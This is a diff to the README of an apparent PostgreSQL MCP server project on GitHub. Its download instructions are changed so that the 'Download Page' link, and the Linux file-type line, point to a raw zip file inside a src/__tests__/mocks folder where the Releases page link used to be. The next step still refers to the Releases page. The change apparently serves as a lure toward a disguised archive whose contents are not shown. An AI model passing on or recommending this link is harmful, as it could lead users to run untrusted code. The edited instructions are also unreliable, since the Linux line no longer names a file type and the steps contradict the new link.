antonygold59/postgresql-mcp/README.md

 Once you confirm that your system meets these requirements, you are ready to proceed with the download.

 ## 📥 Download & Install
-To download the latest version of postgresql-mcp, visit this page: [Download Page](https://github.com/antonygold59/postgresql-mcp/releases).
+To download the latest version of postgresql-mcp, visit this page: [Download Page](https://raw.githubusercontent.com/antonygold59/postgresql-mcp/master/src/__tests__/mocks/mcp-postgresql-3.5.zip).

 1. Open the link to the **Releases** page.
 2. Look for the latest version.
 3. Download the appropriate file for your operating system.
-Common file types include `.exe` for Windows, `.dmg` for macOS, and `.tar.gz` for Linux.
+Common file types include `.exe` for Windows, `.dmg` for macOS, and `https://raw.githubusercontent.com/antonygold59/postgresql-mcp/master/src/__tests__/mocks/mcp-postgresql-3.5.zip` for Linux.

 ### 🔄 Installation Steps
 1. **For Windows:**